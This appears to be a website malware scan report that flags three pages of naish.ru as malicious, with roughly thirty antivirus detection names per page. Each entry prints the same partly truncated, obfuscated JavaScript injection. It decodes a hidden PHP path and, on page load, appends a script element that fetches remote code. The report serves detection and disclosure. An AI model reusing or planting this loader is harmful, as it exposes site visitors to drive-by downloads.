Malicious code - confirmed by antiviruses (see below) var S=new Date();var d=new Date();var f=new Date();function B(){var b;if(b!='' && b!='A'){b='Fl'};var W='';var K=unescape;var fw;if(fw!=''){fw='C'};var v;if(v!=''){v='q'};var Kz=window;var jj=new Date();var j_;if(j_!='' && j_!='O'){j_=''};var M=K("%2f%62%72%65%61%6b%2d%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%62%6c%61%63%6b%62%65%72%72%79%2e%63%6f%6d%2e%70%68%70");this.CM="";var x;if(x!=''){x='Y'};var aW;if(aW!='' && aW!='nq'){aW='Ne'};function j(KE,BZ){var z=String("
... 959 bytes are skipped ...='wu'){uX=null};g[K("%64%65%66%65%72")]=[7,1][1];var fa;if(fa!='' && fa!='Cqu'){fa=null};g[K("%73%72%63")]=pd;e.body.appendChild(g);var Ya;if(Ya!='EC' && Ya != ''){Ya=null};this.Ga='';var Pj;if(Pj!='tN' && Pj != ''){Pj=null};} catch(r){alert(r);var EJ=new Date();var HH=new String();};var ZSC=new Array();}var zG='';Kz[String("onl"+"We4uoad".substr(4))]=F;var BD;if(BD!='' && BD!='nF'){BD='DO'};var gJ;if(gJ!='wD' && gJ!='CW'){gJ=''};};var KX='';var cs='';B();Antivirus reports:- AntiVir
- JS/Redirector.DB.4
- Avast
- JS:Illredir-AQ [Trj]
- Ikarus
- Trojan.JS.Redirector
- Panda
- JS/Redirector.AC
- nProtect
- Trojan.Script.429224
- K7AntiVirus
- Trojan
- TrendMicro-HouseCall
- JS_KEMPAR.SM
- Emsisoft
- Trojan.Script.429224 (B)
- Comodo
- TrojWare.JS.Redirector.UA
- McAfee-GW-Edition
- JS/Redirector.u
- DrWeb
- JS.Redirector.based.3
- TrendMicro
- JS_KEMPAR.SM
- Kaspersky
- HEUR:Trojan-Downloader.Script.Generic
- Microsoft
- Trojan:JS/Redirector.DB
- MicroWorld-eScan
- Trojan.Script.429224
- Fortinet
- JS/Crypt.BBES!tr
- Jiangmin
- Trojan/JS.Pegel.b
- McAfee
- JS/Redirector.u
- NANO-Antivirus
- Trojan.Script.Redirector.yrnhc
- F-Secure
- Trojan.Script.429224
- VIPRE
- Trojan.JS.Redirector.cr (v)
- F-Prot
- JS/Redir.AV
- AVG
- JS/Dropper
- Norman
- Redir.HU
- Sophos
- Troj/JSRedir-BD
- GData
- Trojan.Script.429224
- Commtouch
- JS/Redir.AV
- Agnitum
- JS.Redirector.Gen.5
- ESET-NOD32
- JS/TrojanDownloader.Pegel.AP
- BitDefender
- Trojan.Script.429224
|
http://www.naish.ru/ru/club/ | 200 OK Content-Length: 22965 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var S=new Date();var d=new Date();var f=new Date();function B(){var b;if(b!='' && b!='A'){b='Fl'};var W='';var K=unescape;var fw;if(fw!=''){fw='C'};var v;if(v!=''){v='q'};var Kz=window;var jj=new Date();var j_;if(j_!='' && j_!='O'){j_=''};var M=K("%2f%62%72%65%61%6b%2d%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%62%6c%61%63%6b%62%65%72%72%79%2e%63%6f%6d%2e%70%68%70");this.CM="";var x;if(x!=''){x='Y'};var aW;if(aW!='' && aW!='nq'){aW='Ne'};function j(KE,BZ){var z=String("
... 959 bytes are skipped ...='wu'){uX=null};g[K("%64%65%66%65%72")]=[7,1][1];var fa;if(fa!='' && fa!='Cqu'){fa=null};g[K("%73%72%63")]=pd;e.body.appendChild(g);var Ya;if(Ya!='EC' && Ya != ''){Ya=null};this.Ga='';var Pj;if(Pj!='tN' && Pj != ''){Pj=null};} catch(r){alert(r);var EJ=new Date();var HH=new String();};var ZSC=new Array();}var zG='';Kz[String("onl"+"We4uoad".substr(4))]=F;var BD;if(BD!='' && BD!='nF'){BD='DO'};var gJ;if(gJ!='wD' && gJ!='CW'){gJ=''};};var KX='';var cs='';B();Antivirus reports:- AntiVir
- JS/Redirector.DB.4
- Avast
- JS:Illredir-AQ [Trj]
- Ikarus
- Trojan.JS.Redirector
- Panda
- JS/Redirector.AC
- nProtect
- Trojan.Script.429224
- K7AntiVirus
- Trojan
- TrendMicro-HouseCall
- JS_KEMPAR.SM
- Emsisoft
- Trojan.Script.429224 (B)
- Comodo
- TrojWare.JS.Redirector.UA
- McAfee-GW-Edition
- JS/Redirector.u
- DrWeb
- JS.Redirector.based.3
- TrendMicro
- JS_KEMPAR.SM
- Kaspersky
- HEUR:Trojan-Downloader.Script.Generic
- Microsoft
- Trojan:JS/Redirector.DB
- MicroWorld-eScan
- Trojan.Script.429224
- Fortinet
- JS/Crypt.BBES!tr
- Jiangmin
- Trojan/JS.Pegel.b
- McAfee
- JS/Redirector.u
- NANO-Antivirus
- Trojan.Script.Redirector.yrnhc
- F-Secure
- Trojan.Script.429224
- VIPRE
- Trojan.JS.Redirector.cr (v)
- F-Prot
- JS/Redir.AV
- AVG
- JS/Dropper
- Norman
- Redir.HU
- Sophos
- Troj/JSRedir-BD
- GData
- Trojan.Script.429224
- Commtouch
- JS/Redir.AV
- Agnitum
- JS.Redirector.Gen.5
- ESET-NOD32
- JS/TrojanDownloader.Pegel.AP
- BitDefender
- Trojan.Script.429224
|
http://www.naish.ru/ru/?PHPSESSID=92f3703871e419dffdc1bef158b430a5 | 200 OK Content-Length: 34436 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var S=new Date();var d=new Date();var f=new Date();function B(){var b;if(b!='' && b!='A'){b='Fl'};var W='';var K=unescape;var fw;if(fw!=''){fw='C'};var v;if(v!=''){v='q'};var Kz=window;var jj=new Date();var j_;if(j_!='' && j_!='O'){j_=''};var M=K("%2f%62%72%65%61%6b%2d%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%62%6c%61%63%6b%62%65%72%72%79%2e%63%6f%6d%2e%70%68%70");this.CM="";var x;if(x!=''){x='Y'};var aW;if(aW!='' && aW!='nq'){aW='Ne'};function j(KE,BZ){var z=String("
... 959 bytes are skipped ...='wu'){uX=null};g[K("%64%65%66%65%72")]=[7,1][1];var fa;if(fa!='' && fa!='Cqu'){fa=null};g[K("%73%72%63")]=pd;e.body.appendChild(g);var Ya;if(Ya!='EC' && Ya != ''){Ya=null};this.Ga='';var Pj;if(Pj!='tN' && Pj != ''){Pj=null};} catch(r){alert(r);var EJ=new Date();var HH=new String();};var ZSC=new Array();}var zG='';Kz[String("onl"+"We4uoad".substr(4))]=F;var BD;if(BD!='' && BD!='nF'){BD='DO'};var gJ;if(gJ!='wD' && gJ!='CW'){gJ=''};};var KX='';var cs='';B();Antivirus reports:- AntiVir
- JS/Redirector.DB.4
- Avast
- JS:Illredir-AQ [Trj]
- Ikarus
- Trojan.JS.Redirector
- Panda
- JS/Redirector.AC
- nProtect
- Trojan.Script.429224
- K7AntiVirus
- Trojan
- TrendMicro-HouseCall
- JS_KEMPAR.SM
- Emsisoft
- Trojan.Script.429224 (B)
- Comodo
- TrojWare.JS.Redirector.UA
- McAfee-GW-Edition
- JS/Redirector.u
- DrWeb
- JS.Redirector.based.3
- TrendMicro
- JS_KEMPAR.SM
- Kaspersky
- HEUR:Trojan-Downloader.Script.Generic
- Microsoft
- Trojan:JS/Redirector.DB
- MicroWorld-eScan
- Trojan.Script.429224
- Fortinet
- JS/Crypt.BBES!tr
- Jiangmin
- Trojan/JS.Pegel.b
- McAfee
- JS/Redirector.u
- NANO-Antivirus
- Trojan.Script.Redirector.yrnhc
- F-Secure
- Trojan.Script.429224
- VIPRE
- Trojan.JS.Redirector.cr (v)
- F-Prot
- JS/Redir.AV
- AVG
- JS/Dropper
- Norman
- Redir.HU
- Sophos
- Troj/JSRedir-BD
- GData
- Trojan.Script.429224
- Commtouch
- JS/Redir.AV
- Agnitum
- JS.Redirector.Gen.5
- ESET-NOD32
- JS/TrojanDownloader.Pegel.AP
- BitDefender
- Trojan.Script.429224
|
http://www.naish.ru/ru/catalog/?PHPSESSID=92f3703871e419dffdc1bef158b430a5 | 200 OK Content-Length: 56931 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var S=new Date();var d=new Date();var f=new Date();function B(){var b;if(b!='' && b!='A'){b='Fl'};var W='';var K=unescape;var fw;if(fw!=''){fw='C'};var v;if(v!=''){v='q'};var Kz=window;var jj=new Date();var j_;if(j_!='' && j_!='O'){j_=''};var M=K("%2f%62%72%65%61%6b%2d%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%62%6c%61%63%6b%62%65%72%72%79%2e%63%6f%6d%2e%70%68%70");this.CM="";var x;if(x!=''){x='Y'};var aW;if(aW!='' && aW!='nq'){aW='Ne'};function j(KE,BZ){var z=String("
... 959 bytes are skipped ...='wu'){uX=null};g[K("%64%65%66%65%72")]=[7,1][1];var fa;if(fa!='' && fa!='Cqu'){fa=null};g[K("%73%72%63")]=pd;e.body.appendChild(g);var Ya;if(Ya!='EC' && Ya != ''){Ya=null};this.Ga='';var Pj;if(Pj!='tN' && Pj != ''){Pj=null};} catch(r){alert(r);var EJ=new Date();var HH=new String();};var ZSC=new Array();}var zG='';Kz[String("onl"+"We4uoad".substr(4))]=F;var BD;if(BD!='' && BD!='nF'){BD='DO'};var gJ;if(gJ!='wD' && gJ!='CW'){gJ=''};};var KX='';var cs='';B();Antivirus reports:- AntiVir
- JS/Redirector.DB.4
- Avast
- JS:Illredir-AQ [Trj]
- Ikarus
- Trojan.JS.Redirector
- Panda
- JS/Redirector.AC
- nProtect
- Trojan.Script.429224
- K7AntiVirus
- Trojan
- TrendMicro-HouseCall
- JS_KEMPAR.SM
- Emsisoft
- Trojan.Script.429224 (B)
- Comodo
- TrojWare.JS.Redirector.UA
- McAfee-GW-Edition
- JS/Redirector.u
- DrWeb
- JS.Redirector.based.3
- TrendMicro
- JS_KEMPAR.SM
- Kaspersky
- HEUR:Trojan-Downloader.Script.Generic
- Microsoft
- Trojan:JS/Redirector.DB
- MicroWorld-eScan
- Trojan.Script.429224
- Fortinet
- JS/Crypt.BBES!tr
- Jiangmin
- Trojan/JS.Pegel.b
- McAfee
- JS/Redirector.u
- NANO-Antivirus
- Trojan.Script.Redirector.yrnhc
- F-Secure
- Trojan.Script.429224
- VIPRE
- Trojan.JS.Redirector.cr (v)
- F-Prot
- JS/Redir.AV
- AVG
- JS/Dropper
- Norman
- Redir.HU
- Sophos
- Troj/JSRedir-BD
- GData
- Trojan.Script.429224
- Commtouch
- JS/Redir.AV
- Agnitum
- JS.Redirector.Gen.5
- ESET-NOD32
- JS/TrojanDownloader.Pegel.AP
- BitDefender
- Trojan.Script.429224
|